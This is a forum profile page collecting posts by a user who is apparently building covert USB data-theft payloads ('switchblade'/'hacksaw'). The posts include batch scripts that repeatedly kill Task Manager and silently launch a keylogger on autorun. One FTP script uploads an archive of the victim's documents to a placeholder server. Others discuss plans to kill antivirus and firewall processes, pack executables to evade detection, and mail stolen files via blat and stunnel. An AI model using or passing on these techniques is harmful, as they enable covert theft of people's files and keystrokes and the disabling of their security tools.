Jump to content

sc0rpi0

Active Members
  • Posts

    138
  • Joined

  • Last visited

Everything posted by sc0rpi0

  1. My method is kind of ghetto, but it works well. make a batch file like this with pskill. Have it launched using nircmd with this command: nircmd execmd [batch file name] :begin pskill -t "TASKMGR.EXE" :goto begin
  2. Is it possible to set up something like remote access but so that files can *only* be read and viewed remotely? So that nothing can be modified. Thanks.
  3. Recently, I tried to connect to my computer via psexec. I used this command: psexec machinename[external ip] cmd.exe I received the notice that I must "Make sure that the default admin$ share is enabled on [my machinename]" Any suggestions on how to go about doing this? What does this do? Preferably through command line--not gui. Much appreciated.
  4. True; however, it may be as simple as searching for default installation directories such as "C:Program Files" or even the registry. Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app... Yes, that is a good idea. Unfortunately, I wouldn't be the one to ask. Although "taskill /t" may work, I would recommend using pskill from sysinternals. I wonder...would this killing of child processes do the trick? [thinking outloud] Not only can it kill child processes, but system processes as well.
  5. This method has been tested with mcafee and it works. Exactly which anti virus products are you referring to?
  6. Unfortunately, I don't have a u3. This is how I would do it with a non-u3 drive. This uses pskill from sysinternals. Make a file called file.txt in the root directory of your flash drive. Don't have anything install on the computer except this batch file in some random system directory. Then have it launch. Make sure that the keylogger runs *without* installing anything on the target computer. Have a batch file like this run upon autorun: start.bat [your keylogger executable] call check.bat exit check.bat :begin if exist "%~d0file.txt" goto begin pskill.exe -t "[keylogger process]" exit Sorry this reply is so brief. I am making the assumption that you know how to make batch files. Good luck!
  7. The plan is that the nasties [switchblade apps that avs don't like] will be hidden from detection. Before the nasties are extracted, a batch file or another executable will be run, hopefully killing the av. I am currently compiling the list of av processes and will probably post that sometime during winter break. However, I will may need a little assistance because google doesn't find all av processes.
  8. Thanks for the fantastic suggestion. I just tried it and it veils the files from any av intervention. Thanks again for the idea.
  9. That is a good idea...don't mean to steal your idea, but I have been working on a huge list of av and firewall processes to kill also . It's nearly done and will probably be posted on the usb hacks forum soon. I will consider using this ccrypt ...it looks interesting. Could you please post the commands for what you are trying to do? Keep up the good work! :) Thanks for taking the initiative. Please post any new results so that we may become equally enlightened. Thanks again.
  10. Good question. I am currently on my non-hacking computer. I know it sounds odd, but I have a separate computer for testing even safe software [being the paranoid person I am] It will probably be down until somewhere in winter break :( Sorry if this causes anyone any inconvenience. Once it's fixed, I'll test the packaging tools and reply on this topic. Eventually, it should show up in your "Show new replies to your posts" tab thing. If any one else would like try, please go right ahead. If it's not too much trouble, post your results here. For test binding purposes, I would recommend trying "pspv.exe" in the switchblade usb package. My av goes nuts when I unzip this. Or another that your av would typically pick up without binding. Good luck!
  11. Is this better than UPX or iexpress [all windows come with this--just type "iexpress" into run box]? Thanks very much.
  12. I suppose you are right. Personally, I don't care about people's videos and pictures. So, I only filter out them leaving only textfiles and word documents. Usually 250 mb is enough for these. http://www.esmartstart.com/ Just my personal preference. Automatic ftp can be done with merely a .bat file and a .txt file. And yes, leaving the username and password is necessary. Really simple. Here is how it's done: [bATCH FILE] ftp -s:send.txt [TEXT FILE- called send.txt] open [ftp.yourserver.com] [username] [password] binary prompt n put "archive.rar" bye Still, I guess email *is* more secure and harder to trace. Thanks.
  13. If you want a tutorial, here's a good one. http://www.usbhacks.com/2006/10/29/how-to-...sb-flash-drive/ If you just want the example files, download the "Demo Source Files" which can be accessed in a gray box near the title [centered right]. Just incorporate the commands into go.bat. If you have any questions, ask. Good Luck!
  14. Thanks so much for the help.
  15. I just tried both. Neither worked. All my account information is correct. My firewall is set up to allow blat and stunnel to internet access. Any suggestions?
  16. Where do I pick up one of these? I am presuming that when you say "private" you mean secret: not open to the public. If so, then my previous question was very pointless. Ignore it then. There aren't many of these around are there are there? Even if I manage to find one, how do I know it won't backfire? I know I'm paranoid but don't I have a reason to be? Thanks.
  17. Why doesn't hacksaw use ftp instead of email to deliver the contents of usb drives? More space, faster, and more hidden.
  18. Is there a wildcard which represents all drives [hard drive and all removable]? Thanks.
  19. Taken from http://www.techspot.in/forum/archive/index.php?t-1872.html Thanks. This seems to work...sort of...only with some executables. I am currently looking for a solution to veil executables from the larger AV's such as Norton and Mcafee. Maybe "encrypt" was not the correct word. What I am trying to do is package a file so that the contents can be ran but not detected. I have tried upx and iexpress and managed to hide a file from av but not when it is being run. :( Any more ideas? Thanks.
  20. I know this maybe a very stupid question, but what is google's mail server? I very new to sending mail outside the nice gmail interface. An even more obvious question: would it be the incoming or outgoing server? I think its the outgoing, but am not entirely sure. the two servers are these I believe: incoming: pop.gmail.com outgoing: smtp.gmail.com Much appreciated.
  21. In part of the hacksaw, the blat command: -server 127.0.0.1:1099 is in the send.bat. What server is 127.0.0.1:1099? Is this gmail's server? Thanks very much.
  22. Do you mean upload the entire hardrive? Probably not, because this would take forever. Is there another way of doing this via ftp?
  23. Thanks for your last response. It answered a lot of my questions. The reason why I was wondering about the automatic launching of programs is the switchblade/or hacksaw. I've always wanted to test out the u3 version but haven't been able to. Do I need to install a different launchpad for this purpose? Is it possible to get back my old launchpad after testing the switchblade launchpad? Much appreciated.
×
×
  • Create New...